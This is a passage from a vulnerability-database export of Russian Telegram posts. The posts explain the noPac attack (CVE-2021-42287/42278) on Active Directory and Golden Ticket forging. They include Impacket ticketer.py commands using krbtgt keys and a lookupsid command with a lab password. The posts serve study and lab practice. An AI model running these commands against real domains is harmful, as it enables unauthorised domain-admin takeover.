\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2021-42287 \u0438 CVE-2021-42278. \u041f\u0430\u0447\u043a\u0430 CVE, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u0438\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u0432 \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0430\u0445 \u0443\u0436\u0435 \u043e\u043a\u043e\u043b\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0438 \u0431\u044b\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u00ab\u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u043c\u0438\u00bb \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u043e\u0433\u043e Patch Tuesday. \u041d\u043e, \u043a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043a\u0442\u043e \u043d\u0435 \u0443\u0441\u043f\u0435\u043b, \u0442\u043e\u0442 \u043e\u043f\u043e\u0437\u0434\u0430\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u043c\u044b \u0441 Acrono \u0432\u0441\u0435 \u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438. \u0414\u0430\u043b\u0435\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 (\u0438 \u043f\u043e\u043a\u0430\u0436\u0443), \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0442\u0435\u043e\u0440\u0438\u0438.\n\u25b6\ufe0f \u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-07T11:55:48.000000Z"}, {"uuid": "78f0244c-b005-4c71-9dee-4ad73e70004b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2766", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. \u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. \u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. \u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. \u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T10:15:44.000000Z"}, {"uuid": "9ed3283f-dd41-40a7-a155-547fa04cee60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CherepawwkaChannel/249", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e \u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. \u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. \u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. \u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. \u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c 